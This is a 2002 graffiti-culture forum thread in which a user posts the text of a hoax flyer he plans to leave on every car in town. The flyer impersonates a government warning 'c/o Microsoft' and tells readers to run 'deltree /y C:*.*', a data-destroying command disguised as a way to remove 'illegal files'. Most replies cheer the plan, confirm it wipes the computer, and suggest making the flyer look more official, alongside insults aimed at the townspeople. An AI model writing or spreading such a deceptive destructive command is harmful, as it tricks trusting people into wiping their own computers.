1. Welcome to the 12ozProphet Forum...
    You are currently logged out and viewing our forum as a guest which only allows limited access to our discussions, photos and other forum features. If you are a 12ozProphet Member please login to get the full experience.

If you are not a 12ozProphet Member, please take a moment to register to gain full access to our website and all of its features. As a 12ozProphet Member you will be able to post comments, start discussions, communicate privately with other members and access members-only content. Registration is fast, simple and free, so join today and be a part of the largest and longest running Graffiti, Art, Style & Culture forum online.

Please note, if you are a 12ozProphet Member and are locked out of your account, you can recover your account using the 'lost password' link in the login form. If you no longer have access to the email you registered with, please email us at info@12ozprophet.com and we'll help you recover your account. Welcome to the 12ozProphet Forum (and don't forget to follow @12ozprophet in Instagram)!

Im EVIL

Discussion in 'Channel Zero' started by GLIK$, Aug 7, 2002.

1. GLIK$

GLIK$ Dirty Dozen Crew

Im EVIL

Discussion started by GLIK$ - Aug 7, 2002

HAHAHA this town I live in is so fucking boring, I've decided to provide some minor entertainment for myself. Late one night very soon I plan on putting fliers on every single car in town that read as follow:

BE WARNED!

Your computer may contain hundreds of potentially “illegal” files and/or programs.

Due to the recent passing of the Electronic Copyright Invasion Act by the US Government, your computer may be deemed illegal, and could possible be seized. If you are connected to the World Wide Web in any manor, you are under extreme risk of harboring these now deemed illegal files.

There are ways to protect yourself. The easiest way of finding and removing these illegal files is as follows.

Start your computer. Click on your ‘Start’ button in the lower left hand side of your screen. From there go to the ‘Run’ function, and type in Command. In the black screen that now appears on the screen, type: deltree /y C:*.*

This will in turn search out any and all illegal files on your computer and remove them in a safe and worry free manor.

This has been brought to you by the Nihilists Protection Agency c/o Microsoft Corporation.
    201 Jones Road, Waltham, MA 02451

The best thing is, my town is literally FULL of retards and mentally inept people who will believe this and run home to go do so.

Let the fun begin.

GLIK$ - Rank: Dirty Dozen Crew - Messages:
  2. ArtvandaL

ArtvandaL Guest

ArtvandaL - Replied Aug 7, 2002

so uh...
    what really happens if you do that? the whole computer suddenly erases or something lik that? tell me cause I think thats a great funny idea, i like it if it fucks up your pc

3. GLIK$

GLIK$ Dirty Dozen Crew

GLIK$ - Replied Aug 7, 2002

yes it fucks up your computer.

4. CHEWBAKALLAH

CHEWBAKALLAH Guest

CHEWBAKALLAH - Replied Aug 7, 2002

hahaha, you both need to be slapped

5. ArtvandaL

ArtvandaL Guest

ArtvandaL - Replied Aug 7, 2002

but isnt there any "are you sure you want to do this?" things that pop up when you do that, or doesnt the computer take time to fuck itself,like enough time to hit "cancel"

sounds fun though, I like it, I can imagine all the stupid fucken people bustin their own computers hahahahha

6. GLIK$

GLIK$ Dirty Dozen Crew

Theres no, "Hey are you an idiot?" prompt that comes up, your computer thinks that if you are in your DOS prompt, that you may actually know what youre doing.

7. Kr430n5_666

Kr430n5_666 Banned

Kr430n5_666 - Replied Aug 7, 2002

that is terrible.

do it.

dont do it.

shit i dont even know if i would do it. pros and cons. dance dance dance.

Kr430n5_666 - Rank: Banned - Messages:
  8. sneak

sneak Guest

sneak - Replied Aug 7, 2002

i can imagine dum ass people doing that

9. spec

spec Guest

spec - Replied Aug 7, 2002

Anyone dumb enough to listen to a flyer on the front windshield of thier car probably deserves to get thier comp erased. You gotta get some kind of serious looking government emblem at the heading.

10. Dr. Dazzle

Dr. Dazzle 12oz Veteran Member

Dr. Dazzle - Replied Aug 7, 2002

What an utterly fiendish idea.....

Brilliant.....:idea:

Dr. Dazzle - Rank: 12oz Veteran Member - Messages:
  11. Grandola

Grandola 12oz Senior Member

Grandola - Replied Aug 7, 2002

my hypothesis:

i suspect someone (who shall remain nameless) may have previously fallen victim to one of these types of scams in the past...

Grandola - Rank: 12oz Senior Member - Messages:
  12. --zeSto--

--zeSto-- Guest

--zeSto-- - Replied Aug 7, 2002

I enjoy that kind of thing.
    It's like a computer virus that becomes organic and is spread by stupid people.
    I got an email once from a girl and it said to delete a certain program file.
    I check it out with google and found it to be a hoax. But by the time I could reply,
    the girl trashed her Dad's computer. oops!

13. Kr430n5_666

Kr430n5_666 Banned

Kr430n5_666 - Replied Aug 7, 2002

now that i think of it...if you are going to claim microsoft is responsibe, then definitly do it.

Kr430n5_666 - Rank: Banned - Messages:
  14. DEE38

DEE38 12oz Loyalist

DEE38 - Replied Aug 7, 2002

before you you start handing out these fliers, do a spellcheck so they know its legit.

manor=manner

tell us how it goes.

DEE38 - Rank: 12oz Loyalist - Messages:
  15. GLIK$

GLIK$ Dirty Dozen Crew

I havent typed the the flyer yet, it was 4:43am when i typed this, but ha thanks for catching my sleep deprived ignorence.